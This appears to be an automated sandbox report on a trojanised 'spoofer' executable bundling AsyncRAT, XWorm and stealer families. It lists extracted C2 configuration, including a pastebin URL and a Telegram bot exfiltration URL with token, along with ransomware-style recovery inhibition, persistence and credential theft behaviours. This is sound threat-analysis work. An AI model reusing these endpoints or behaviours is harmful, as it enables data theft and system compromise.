asyncrat | aa8b6bfba812dcd1a85296a313cf859837394b9f917313abba64fa7678a110ed

Analysis

max time kernel
39s
max time network
100s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
13-11-2024 16:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Proxy's Spoofer V2.exe
Size

6.0MB
MD5

710df7d1b2f1b2ee6753747d5c04b346
SHA1

294f0da01e406b2f58c132400385cb6f31d1c93e
SHA256

aa8b6bfba812dcd1a85296a313cf859837394b9f917313abba64fa7678a110ed
SHA512

b91a9e3cba368e6d3199f66817ab766e72ccc6556b8ee9abdaa50511e48fdb09ffa57b6548864f3e1b77fcdaeda7c30456aff90375fd3b3ee8267860f0fc2285
SSDEEP

98304:aEv4T1+hACMzMtXqIEO8ODEO4bTFF+LocldaK3//LMAEyHBso06:yTYbUVO8gWF+LDraK37MvJ6

Score

10^/10

asyncrat gurcu stormkitty xworm proxy defense_evasion discovery evasion execution impact persistence ransomware rat spyware stealer trojan

Malware Config

Extracted

Family

asyncrat

Version

Venom Pwn3rzs' Edtition v6.0.1

Botnet

Proxy

Mutex

0rU9DnsLkR

Attributes

delay
1
install
true
install_file
NetworkEX.exe
install_folder
%AppData%
pastebin_config
https://pastebin.com/raw/RgYXYwVV

aes.plain

Extracted

Family

xworm

Attributes

Install_directory
%AppData%
install_file
NetworkEXP.exe
pastebin_url
https://pastebin.com/raw/RgYXYwVV
telegram
https://api.telegram.org/bot6554307825:AAFiCM4YZlx7R1yb0K0d5pqenjePI2Nljfc/sendMessage?chat_id=6077384108

Extracted

Family

gurcu

https://api.telegram.org/bot6554307825:AAFiCM4YZlx7R1yb0K0d5pqenjePI2Nljfc/sendMessage?chat_id=6077384108

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Deletes NTFS Change Journal 2 TTPs 3 IoCs

The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.

ransomware

Inhibit System Recovery

T1490

Data Destruction

T1485

pid	Process
5808	fsutil.exe
5644	fsutil.exe
336	fsutil.exe

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000a000000023b92-52.dat	family_xworm
behavioral1/memory/2756-116-0x0000000000660000-0x000000000067E000-memory.dmp	family_xworm

Gurcu family
gurcu
Gurcu, WhiteSnake
Gurcu is a malware stealer written in C#.
stealer gurcu
StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000a000000023b93-107.dat	family_stormkitty
behavioral1/memory/4228-117-0x0000000000370000-0x0000000000408000-memory.dmp	family_stormkitty

Stormkitty family
stormkitty
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral1/files/0x000a000000023b90-50.dat	family_asyncrat

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Blocklisted process makes network request 6 IoCs

flow	pid	Process
26	5304	curl.exe
91	6080	sihclient.exe
97	6080	sihclient.exe
104	6080	sihclient.exe
106	6080	sihclient.exe
109	6080	sihclient.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
5408	powershell.exe
5580	powershell.exe
4180	powershell.exe
3480	powershell.exe
5368	powershell.exe
4160	powershell.exe
3392	powershell.exe
5672	powershell.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
836	netsh.exe

Sets file to hidden 1 TTPs 2 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
4344	attrib.exe
2832	attrib.exe

Checks computer location settings 2 TTPs 9 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	Proxy's Spoofer V2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	Network Experience.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	NetworkEX.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	NEX.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	NetworkEX.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	NXT Cleaner.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	AccuracyFN Swoofer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	Network.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	$77NetworkEX.exe

Drops startup file 3 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetworkEXP.lnk	Network.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetworkEXP.lnk	Network.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	Cleaner.exe

Executes dropped EXE 13 IoCs

pid	Process
4184	NetworkEX.exe
4564	NXT Cleaner.exe
876	nExOs.exe
3512	Koks_Cleaner.exe
836	Network Experience.exe
2756	Network.exe
4228	NetworkEX.exe
2964	NEX.exe
4420	AccuracyFN Swoofer.exe
5880	NetworkEX.exe
6004	NetworkXE.exe
4452	Cleaner.exe
3696	$77NetworkEX.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetworkXE = "\"C:\\Users\\Admin\\AppData\\Roaming\\NetworkXE.exe\""	NetworkEX.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetworkEXP = "C:\\Users\\Admin\\AppData\\Roaming\\NetworkEXP.exe"	Network.exe

Drops desktop.ini file(s) 51 IoCs

description	ioc	Process
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn1\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Public\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Public\AccountPictures\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Admin\3D Objects\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	Cleaner.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	Cleaner.exe

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\D:	fsutil.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
53	pastebin.com
87	discord.com
88	discord.com
49	pastebin.com
50	pastebin.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
10	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\restore\MachineGuid.txt	Cleaner.exe

Drops file in Windows directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\servicing\InboxFodMetadataCache\metadata\LA122E~1.MUM	cmd.exe
File opened for modification	C:\Windows\servicing\InboxFodMetadataCache\metadata\LA9C76~1.MUM	cmd.exe
File opened for modification	C:\Windows\servicing\InboxFodMetadataCache\metadata\LA4D0B~2.MUM	cmd.exe
File opened for modification	C:\Windows\INF\mdmcommu.inf	cmd.exe
File opened for modification	C:\Windows\INF\mdmhay2.inf	cmd.exe
File opened for modification	C:\Windows\INF\netax88179_178a.inf	cmd.exe
File opened for modification	C:\Windows\INF\prnms005.inf	cmd.exe
File opened for modification	C:\Windows\INF\puwk.inf	cmd.exe
File opened for modification	C:\Windows\INF\rdyboost\0409\ReadyBoostPerfCounters.ini	cmd.exe
File opened for modification	C:\Windows\INF\TAPISRV\0407\tapiperf.ini	cmd.exe
File opened for modification	C:\Windows\INF\usbhub\0407\usbperf.ini	cmd.exe
File opened for modification	C:\Windows\INF\.NET Data Provider for Oracle\040C\_DataOracleClientPerfCounters_shared12_neutral_d.ini	cmd.exe
File opened for modification	C:\Windows\servicing\InboxFodMetadataCache\metadata\LAFA3D~1.MUM	cmd.exe
File opened for modification	C:\Windows\servicing\InboxFodMetadataCache\metadata\LAF3CD~1.MUM	cmd.exe
File opened for modification	C:\Windows\servicing\InboxFodMetadataCache\metadata\LAC111~1.MUM	cmd.exe
File opened for modification	C:\Windows\INF\mdmtdkj7.inf	cmd.exe
File opened for modification	C:\Windows\INF\mdmzoom.inf	cmd.exe
File opened for modification	C:\Windows\INF\c_processor.inf	cmd.exe
File opened for modification	C:\Windows\INF\iagpio.inf	cmd.exe
File opened for modification	C:\Windows\INF\mdmnis1u.inf	cmd.exe
File opened for modification	C:\Windows\INF\wvmic.inf	cmd.exe
File opened for modification	C:\Windows\servicing\InboxFodMetadataCache\metadata\LA16DD~1.MUM	cmd.exe
File opened for modification	C:\Windows\servicing\InboxFodMetadataCache\metadata\LA2A3F~1.MUM	cmd.exe
File opened for modification	C:\Windows\INF\netwew01.inf	cmd.exe
File opened for modification	C:\Windows\INF\storufs.inf	cmd.exe
File opened for modification	C:\Windows\INF\.NET CLR Networking 4.0.0.0\_Networkingperfcounters.ini	cmd.exe
File opened for modification	C:\Windows\INF\.NETFramework\0410\corperfmonsymbols_d.ini	cmd.exe
File opened for modification	C:\Windows\INF\c_fscontentscreener.inf	cmd.exe
File opened for modification	C:\Windows\INF\mdmjf56e.inf	cmd.exe
File opened for modification	C:\Windows\INF\netmlx5.inf	cmd.exe
File opened for modification	C:\Windows\INF\netvwififlt.inf	cmd.exe
File opened for modification	C:\Windows\INF\rtux64w10.inf	cmd.exe
File opened for modification	C:\Windows\INF\WINDOW~1.0\0409\PerfCounters_D.ini	cmd.exe
File opened for modification	C:\Windows\servicing\InboxFodMetadataCache\metadata\LA35A0~1.MUM	cmd.exe
File opened for modification	C:\Windows\servicing\InboxFodMetadataCache\metadata\LAA74D~1.MUM	cmd.exe
File opened for modification	C:\Windows\INF\ChargeArbitration.inf	cmd.exe
File opened for modification	C:\Windows\INF\netjme.inf	cmd.exe
File opened for modification	C:\Windows\INF\Windows Workflow Foundation 4.0.0.0\040C\PerfCounters_d.ini	cmd.exe
File created	C:\Windows\Network.exe	NetworkEX.exe
File opened for modification	C:\Windows\INF\BITS\0409\bitsctrs.ini	cmd.exe
File opened for modification	C:\Windows\INF\mdmsun1.inf	cmd.exe
File opened for modification	C:\Windows\INF\monitor.inf	cmd.exe
File opened for modification	C:\Windows\INF\netvg63a.inf	cmd.exe
File opened for modification	C:\Windows\INF\sceregvl.inf	cmd.exe
File opened for modification	C:\Windows\INF\SERVIC~1.0\0409\_ServiceModelEndpointPerfCounters_D.ini	cmd.exe
File opened for modification	C:\Windows\INF\wsdprint.inf	cmd.exe
File opened for modification	C:\Windows\INF\megasas2i.inf	cmd.exe
File opened for modification	C:\Windows\INF\TermService\040C\tslabels.ini	cmd.exe
File opened for modification	C:\Windows\INF\tsprint.inf	cmd.exe
File opened for modification	C:\Windows\servicing\InboxFodMetadataCache\metadata\RSATNE~1.MUM	cmd.exe
File opened for modification	C:\Windows\INF\mdmcom1.inf	cmd.exe
File opened for modification	C:\Windows\INF\mdmmct.inf	cmd.exe
File opened for modification	C:\Windows\INF\mdmnttd6.inf	cmd.exe
File opened for modification	C:\Windows\INF\netvchannel.inf	cmd.exe
File opened for modification	C:\Windows\INF\tpm.inf	cmd.exe
File opened for modification	C:\Windows\servicing\InboxFodMetadataCache\metadata\LA55DC~1.MUM	cmd.exe
File opened for modification	C:\Windows\servicing\InboxFodMetadataCache\metadata\PRINTF~1.MUM	cmd.exe
File opened for modification	C:\Windows\INF\mbtr8897w81x64.inf	cmd.exe
File opened for modification	C:\Windows\INF\mdmsuprv.inf	cmd.exe
File opened for modification	C:\Windows\INF\SERVIC~2.0\0409\_ServiceModelOperationPerfCounters_D.ini	cmd.exe
File opened for modification	C:\Windows\INF\usbnet.inf	cmd.exe
File opened for modification	C:\Windows\INF\wsearchidxpi\idxcntrs.h	cmd.exe
File opened for modification	C:\Windows\servicing\InboxFodMetadataCache\metadata\LAA409~1.MUM	cmd.exe
File opened for modification	C:\Windows\servicing\InboxFodMetadataCache\metadata\LA7B3F~1.MUM	cmd.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Proxy's Spoofer V2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NetworkEX.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 12 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3016	cmd.exe
4336	cmd.exe
5304	curl.exe
2300	cmd.exe
5756	reg.exe
1128	cmd.exe
2296	reg.exe
1160	cmd.exe
3140	cmd.exe
4660	curl.exe
6060	cmd.exe
2840	cmd.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	reg.exe

Delays execution with timeout.exe 3 IoCs

evasion

pid	Process
2020	timeout.exe
2700	timeout.exe
296	timeout.exe

Enumerates system info in registry 2 TTPs 32 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier	Cleaner.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardProduct = "Paste-2050786398508"	reg.exe
Key created	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral	Cleaner.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1\Identifier = "2af17-4fe30-1d5b52d5b"	Cleaner.exe
Key created	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0	reg.exe
Key created	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1	reg.exe
Key created	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0	reg.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier = "Paste-20510-19387-263735943"	reg.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardProduct = "20425207320656"	reg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier	reg.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1\Identifier = "20429-12821-575226952"	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral	Cleaner.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1\Identifier	reg.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0	Cleaner.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1	Cleaner.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1	Cleaner.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier = "20429-12821-575226952"	reg.exe
Key created	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	reg.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1\Identifier = "Paste-20510-19387-263735943"	reg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier	reg.exe
Key created	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1	reg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1\Identifier	reg.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Set value (str)	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier = "14c85-3c9b7-87313b3d0"	Cleaner.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardProduct	reg.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardProduct	reg.exe
Key enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral	Cleaner.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0	Cleaner.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1\Identifier	Cleaner.exe

Gathers network information 2 TTPs 3 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
1436	ipconfig.exe
4236	ipconfig.exe
5472	ipconfig.exe

Interacts with shadow copies 3 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
6000	vssadmin.exe

Kills process with taskkill 11 IoCs

evasion

pid	Process
1044	taskkill.exe
636	taskkill.exe
3676	taskkill.exe
4884	taskkill.exe
2420	taskkill.exe
1920	taskkill.exe
5432	taskkill.exe
1552	taskkill.exe
3732	taskkill.exe
4160	taskkill.exe
1448	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Migration	reg.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Migration\IE Installed Date = 204481177514633749215770776632731136535945	reg.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Migration\IE Installed Date = fed34ca53ad17be16fb19a7fe1b6b6ed94e980a669	Cleaner.exe

Modifies registry class 15 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\discord-812970075899428864\shell	NXT Cleaner.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Interface	reg.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Interface\ClsidStore = 020442230471167324901279093268026506195085690105712076922836	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Installer\Dependencies	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Installer	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\discord-812970075899428864\shell\open\command	NXT Cleaner.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\discord-812970075899428864\ = "URL:Run game 812970075899428864 protocol"	NXT Cleaner.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\discord-812970075899428864\DefaultIcon	NXT Cleaner.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\discord-812970075899428864\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\NXT Cleaner.exe"	NXT Cleaner.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Installer\Dependencies\MSICache = 2044811775146337492157707766327311365359453104220473	reg.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Installer\Dependencies\MSICache = d8da4711304eafcf55007a0d020b675c0d3b228c9c71162b9549	Cleaner.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\discord-812970075899428864	NXT Cleaner.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\discord-812970075899428864\shell\open	NXT Cleaner.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\discord-812970075899428864\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\NXT Cleaner.exe"	NXT Cleaner.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\discord-812970075899428864\URL Protocol	NXT Cleaner.exe

Modifies registry key 1 TTPs 64 IoCs

Modify Registry

T1112

pid	Process
5784	reg.exe
4524	reg.exe
5308	reg.exe
544	reg.exe
5960	reg.exe
4740	reg.exe
3192	reg.exe
2252	reg.exe
1528	reg.exe
3604	reg.exe
1884	reg.exe
5684	reg.exe
1920	reg.exe
5324	reg.exe
5068	reg.exe
4872	reg.exe
5288	reg.exe
3612	reg.exe
2872	reg.exe
336	reg.exe
